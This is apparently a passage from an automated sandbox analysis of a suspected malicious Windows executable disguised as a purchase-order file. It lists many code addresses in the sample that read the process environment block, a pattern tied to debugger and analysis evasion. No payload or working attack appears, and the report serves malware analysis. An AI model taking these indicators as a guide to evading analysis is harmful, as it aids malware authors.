                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h]4_2_01BAE016
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE016 mov eax, dword ptr fs:[00000030h]4_2_01BAE016
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C14000 mov ecx, dword ptr fs:[00000030h]4_2_01C14000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C32000 mov eax, dword ptr fs:[00000030h]4_2_01C32000
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBC073 mov eax, dword ptr fs:[00000030h]4_2_01BBC073
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92050 mov eax, dword ptr fs:[00000030h]4_2_01B92050
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26030 mov eax, dword ptr fs:[00000030h]4_2_01C26030
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C163C0 mov eax, dword ptr fs:[00000030h]4_2_01C163C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4C3CD mov eax, dword ptr fs:[00000030h]4_2_01C4C3CD
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C343D4 mov eax, dword ptr fs:[00000030h]4_2_01C343D4
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C343D4 mov eax, dword ptr fs:[00000030h]4_2_01C343D4
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h]4_2_01C3E3DB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h]4_2_01C3E3DB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E3DB mov ecx, dword ptr fs:[00000030h]4_2_01C3E3DB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3E3DB mov eax, dword ptr fs:[00000030h]4_2_01C3E3DB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h]4_2_01B88397
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h]4_2_01B88397
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B88397 mov eax, dword ptr fs:[00000030h]4_2_01B88397
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h]4_2_01B8E388
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h]4_2_01B8E388
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E388 mov eax, dword ptr fs:[00000030h]4_2_01B8E388
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB438F mov eax, dword ptr fs:[00000030h]4_2_01BB438F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB438F mov eax, dword ptr fs:[00000030h]4_2_01BB438F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC63FF mov eax, dword ptr fs:[00000030h]4_2_01BC63FF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h]4_2_01BAE3F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h]4_2_01BAE3F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BAE3F0 mov eax, dword ptr fs:[00000030h]4_2_01BAE3F0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA03E9 mov eax, dword ptr fs:[00000030h]4_2_01BA03E9
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B9A3C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h]4_2_01B983C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h]4_2_01B983C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h]4_2_01B983C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B983C0 mov eax, dword ptr fs:[00000030h]4_2_01B983C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C12349 mov eax, dword ptr fs:[00000030h]4_2_01C12349
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6634F mov eax, dword ptr fs:[00000030h]4_2_01C6634F
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C38350 mov ecx, dword ptr fs:[00000030h]4_2_01C38350
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C5A352 mov eax, dword ptr fs:[00000030h]4_2_01C5A352
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov ecx, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1035C mov eax, dword ptr fs:[00000030h]4_2_01C1035C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C310 mov ecx, dword ptr fs:[00000030h]4_2_01B8C310
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB0310 mov ecx, dword ptr fs:[00000030h]4_2_01BB0310
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h]4_2_01BCA30B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h]4_2_01BCA30B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA30B mov eax, dword ptr fs:[00000030h]4_2_01BCA30B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C3437C mov eax, dword ptr fs:[00000030h]4_2_01C3437C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h]4_2_01C68324
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C68324 mov ecx, dword ptr fs:[00000030h]4_2_01C68324
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h]4_2_01C68324
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C68324 mov eax, dword ptr fs:[00000030h]4_2_01C68324
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C662D6 mov eax, dword ptr fs:[00000030h]4_2_01C662D6
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA02A0 mov eax, dword ptr fs:[00000030h]4_2_01BA02A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA02A0 mov eax, dword ptr fs:[00000030h]4_2_01BA02A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE284 mov eax, dword ptr fs:[00000030h]4_2_01BCE284
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE284 mov eax, dword ptr fs:[00000030h]4_2_01BCE284
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h]4_2_01C10283
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h]4_2_01C10283
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C10283 mov eax, dword ptr fs:[00000030h]4_2_01C10283
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h]4_2_01BA02E1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h]4_2_01BA02E1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA02E1 mov eax, dword ptr fs:[00000030h]4_2_01BA02E1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov ecx, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C262A0 mov eax, dword ptr fs:[00000030h]4_2_01C262A0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B9A2C3 mov eax, dword ptr fs:[00000030h]4_2_01B9A2C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C18243 mov eax, dword ptr fs:[00000030h]4_2_01C18243
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C18243 mov ecx, dword ptr fs:[00000030h]4_2_01C18243
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8823B mov eax, dword ptr fs:[00000030h]4_2_01B8823B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h]4_2_01C4A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A250 mov eax, dword ptr fs:[00000030h]4_2_01C4A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C6625D mov eax, dword ptr fs:[00000030h]4_2_01C6625D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C40274 mov eax, dword ptr fs:[00000030h]4_2_01C40274
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8826B mov eax, dword ptr fs:[00000030h]4_2_01B8826B
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B94260 mov eax, dword ptr fs:[00000030h]4_2_01B94260
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B96259 mov eax, dword ptr fs:[00000030h]4_2_01B96259
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8A250 mov eax, dword ptr fs:[00000030h]4_2_01B8A250
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h]4_2_01BB45B1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB45B1 mov eax, dword ptr fs:[00000030h]4_2_01BB45B1
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE59C mov eax, dword ptr fs:[00000030h]4_2_01BCE59C
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC4588 mov eax, dword ptr fs:[00000030h]4_2_01BC4588
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92582 mov eax, dword ptr fs:[00000030h]4_2_01B92582
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B92582 mov ecx, dword ptr fs:[00000030h]4_2_01B92582
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h]4_2_01BCC5ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCC5ED mov eax, dword ptr fs:[00000030h]4_2_01BCC5ED
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B925E0 mov eax, dword ptr fs:[00000030h]4_2_01B925E0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE5E7 mov eax, dword ptr fs:[00000030h]4_2_01BBE5E7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C105A7 mov eax, dword ptr fs:[00000030h]4_2_01C105A7
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B965D0 mov eax, dword ptr fs:[00000030h]4_2_01B965D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h]4_2_01BCA5D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCA5D0 mov eax, dword ptr fs:[00000030h]4_2_01BCA5D0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h]4_2_01BCE5CF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE5CF mov eax, dword ptr fs:[00000030h]4_2_01BCE5CF
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBE53E mov eax, dword ptr fs:[00000030h]4_2_01BBE53E
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BA0535 mov eax, dword ptr fs:[00000030h]4_2_01BA0535
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C26500 mov eax, dword ptr fs:[00000030h]4_2_01C26500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C64500 mov eax, dword ptr fs:[00000030h]4_2_01C64500
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC656A mov eax, dword ptr fs:[00000030h]4_2_01BC656A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h]4_2_01B98550
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B98550 mov eax, dword ptr fs:[00000030h]4_2_01B98550
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC44B0 mov ecx, dword ptr fs:[00000030h]4_2_01BC44B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B964AB mov eax, dword ptr fs:[00000030h]4_2_01B964AB
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B904E5 mov ecx, dword ptr fs:[00000030h]4_2_01B904E5
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A49A mov eax, dword ptr fs:[00000030h]4_2_01C4A49A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1A4B0 mov eax, dword ptr fs:[00000030h]4_2_01C1A4B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C4A456 mov eax, dword ptr fs:[00000030h]4_2_01C4A456
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8E420 mov eax, dword ptr fs:[00000030h]4_2_01B8E420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8C427 mov eax, dword ptr fs:[00000030h]4_2_01B8C427
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C1C460 mov ecx, dword ptr fs:[00000030h]4_2_01C1C460
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BC8402 mov eax, dword ptr fs:[00000030h]4_2_01BC8402
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BBA470 mov eax, dword ptr fs:[00000030h]4_2_01BBA470
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BB245A mov eax, dword ptr fs:[00000030h]4_2_01BB245A
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01C16420 mov eax, dword ptr fs:[00000030h]4_2_01C16420
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01B8645D mov eax, dword ptr fs:[00000030h]4_2_01B8645D
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BCE443 mov eax, dword ptr fs:[00000030h]4_2_01BCE443
